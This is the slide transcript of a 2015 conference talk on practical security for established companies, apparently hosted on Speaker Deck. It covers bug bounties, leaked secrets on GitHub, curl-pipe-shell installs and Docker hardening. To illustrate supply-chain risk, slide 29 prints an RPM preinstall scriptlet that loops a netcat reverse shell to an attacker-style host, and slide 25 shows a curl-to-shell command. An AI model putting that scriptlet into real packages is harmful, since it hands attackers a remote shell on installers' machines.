$30 off During Our Annual Pro Sale. View Details »

Security for non-unicorns

Bea Hughes
September 25, 2015

Security for non-unicorns

Operability.io September 2015.

Security is becoming quite the thing now days, everyone wants to have one of them. The mantra that things should be built with security in mind and can't be plastered on later is a very important one, if you're based in Silicon Valley and are about to write "teh new hotness", but what happens if your company is older than say, 6 months. You already have some legacy systems and code. I'll be talking about how it's possible to unearth some of these things. What happens when you do uncover these things. How to stop them happening. And coping strategies for dealing with them

Bea Hughes

September 25, 2015
Tweet

More Decks by Bea Hughes

Other Decks in Technology

Transcript

  1. Security For Non-Unicorns
    1 https://www.etsy.com/listing/205741051/unicorn-dog-hat-rainbow-unicorn-dog
    @benjammingh for Operability.io 1

    View Slide

  2. Who's this clown? 2
    • Infrastructure security charlatan at Etsy
    • Operations monkey at Puppet Labs
    • Survived a bunch of startups in London. (some of them still
    have websites...)
    • Has far too many opinions about pretty much everything on
    the TwitterNet @benjammingh
    2 https://twitter.com/skullmandible/status/411281851131523072
    @benjammingh for Operability.io 2

    View Slide

  3. Unicorns?
    @benjammingh for Operability.io 3

    View Slide

  4. Setlist
    • The problem(™).
    • The solution(s)(™).
    • The wrap up.
    • Rapturous applause.
    • We all go home/dance parties/our secret lives as
    superheroes & heroines.
    @benjammingh for Operability.io 4

    View Slide

  5. The problem
    security is hard.
    @benjammingh for Operability.io 5

    View Slide

  6. From tiny seeds, do mighty
    acorns grow.
    • PinkiePwn's 6 small bugs in Chrome to full sandbox escape
    • Egor Homakov's 5 small bugs in Github to full private access
    on GitHub
    • from XSS to remote code execution in under an hour
    • Username & password stolen for HVAC system leads to
    $160+ Million Target breach.
    @benjammingh for Operability.io 6

    View Slide

  7. Things that aren't
    security are hard too.
    @benjammingh for Operability.io 7

    View Slide

  8. Computering is hard.
    No. 1 takeaway for security types is a sense of perspective.
    @benjammingh for Operability.io 8

    View Slide

  9. Security people aren't great
    secure coders.
    • Snort: 10 CVEs, Wireshark: 322! CVEs
    • Joxean Koret on Breaking Antivurius software
    • Security Firm Bit9 Hacked, Used to Spread Malware
    • Tavis Ormandy from Project Zero on exploiting ESET
    • BEST! FireEye just running Apache/PHP as root
    @benjammingh for Operability.io 9

    View Slide

  10. So who do I trust?
    • No one? Always a great position for security people, who
    don't want to get paid.
    • Everyone? Do I have a 419 email for YOU!
    • Security vendors? If you have infinite money and no
    attackers.
    • Attackers!
    @benjammingh for Operability.io 10

    View Slide

  11. "You're already being
    probed for security
    holes, do you want to
    know or not?"
    @benjammingh for Operability.io 11

    View Slide

  12. Bug bounties 101:
    Have one!
    Bug Crowd vs. HackerOne
    @benjammingh for Operability.io 12

    View Slide

  13. Bug bounties 102:
    Prepare a lot.
    @benjammingh for Operability.io 13

    View Slide

  14. Bug bounties 103:
    The first few weeks will be hell.
    @benjammingh for Operability.io 14

    View Slide

  15. Bug bounties 104:
    Be ready with bees!
    @benjammingh for Operability.io 15

    View Slide

  16. Security on the inside
    @benjammingh for Operability.io 16

    View Slide

  17. Armadillo security
    architecture
    @benjammingh for Operability.io 17

    View Slide

  18. Cloud
    @benjammingh for Operability.io 18

    View Slide

  19. Github
    @benjammingh for Operability.io 19

    View Slide

  20. @benjammingh for Operability.io 20

    View Slide

  21. But this doesn't
    happen in real life,
    right?
    @benjammingh for Operability.io 21

    View Slide

  22. @benjammingh for Operability.io 22

    View Slide

  23. Go use Gitrob
    • http://michenriksen.com/blog/gitrob-putting-the-open-
    source-in-osint/
    • https://github.com/michenriksen/gitrob
    @benjammingh for Operability.io 23

    View Slide

  24. curl | bash
    @benjammingh for Operability.io 24

    View Slide

  25. curl legit.pw/mac | sh
    @benjammingh for Operability.io 25

    View Slide

  26. "But I check them, obviously!"
    @benjammingh for Operability.io 26

    View Slide

  27. @benjammingh for Operability.io 27

    View Slide

  28. curl | bash
    "But this is no worse than packages."
    root# yum install sketchy
    @benjammingh for Operability.io 28

    View Slide

  29. curl | bash
    root# rpm -qp --scripts sketchy-1.33-7.rpm
    preinstall scriptlet (using /bin/sh):
    bash -c 'while : ; \
    do \
    nc -e /bin/sh root.legit.pw 2222 ;\
    done'
    @benjammingh for Operability.io 29

    View Slide

  30. A LIVE DEMO, madness.
    @benjammingh for Operability.io 30

    View Slide

  31. Lightweight containers!
    @benjammingh for Operability.io 31

    View Slide

  32. chroot(8)
    @benjammingh for Operability.io 32

    View Slide

  33. FreeBSD Jails
    @benjammingh for Operability.io 33

    View Slide

  34. Solaris Zones
    @benjammingh for Operability.io 34

    View Slide

  35. AIX LPAR
    @benjammingh for Operability.io 35

    View Slide

  36. @benjammingh for Operability.io 36

    View Slide

  37. Is Docker secure?
    @benjammingh for Operability.io 37

    View Slide

  38. >30% of Images in
    Docker Hub Contain
    High Priority Security
    Vulns
    - Jayanth Gummaraju, Tarun Desikan and Yoshio Turner
    from BanyanOps
    @benjammingh for Operability.io 38

    View Slide

  39. @benjammingh for Operability.io 39

    View Slide

  40. As secure as Vagrant?
    @benjammingh for Operability.io 40

    View Slide

  41. But is Docker itself secure?
    • Don't run things as root.
    • No really, stop running things as root.
    • Did I mention not running things as root.
    • It is also not 1999.
    (Docker 1.8 addresses some of this, with it's changes to who it
    runs as)
    @benjammingh for Operability.io 41

    View Slide

  42. Securify the Docker.
    • Don't use --privileged.
    • Use --cap-drop all and --cap-drop to get the
    minimum capabilities.
    • Use Docker Notary
    • Use GRSecurity (just do that anyway, if you can.)
    • Use SELinux... I may as well ask for a pony here.
    @benjammingh for Operability.io 42

    View Slide

  43. Summary
    • Computers are apparently hard.
    • Security is clearly harder still, obv.
    • Actually trust and humans is hard.
    • The typing is the easy bit. (ish)
    @benjammingh for Operability.io 43

    View Slide

  44. More Summary
    • Complex systems lead to much more complex security
    problems. (see Oauth)
    • Annual pen-tests don't scale, bug bounties can.
    • Attackers are mining any public info you have (GitHub, S3)
    • I beg you to stop trusting curl.
    • Docker and security can be used in the same sentence.
    @benjammingh for Operability.io 44

    View Slide

  45. Thank you!
    Twidder: @benjammingh
    LinkedIn: lnkdin.me/p/benyeah
    FidoNet: 2:254/524.13
    JitHub: github.com/barn
    SpeakerDeck: speakerdeck.com/barnbarn
    Etsy: Careers CodeAsCraft
    @benjammingh for Operability.io 45

    View Slide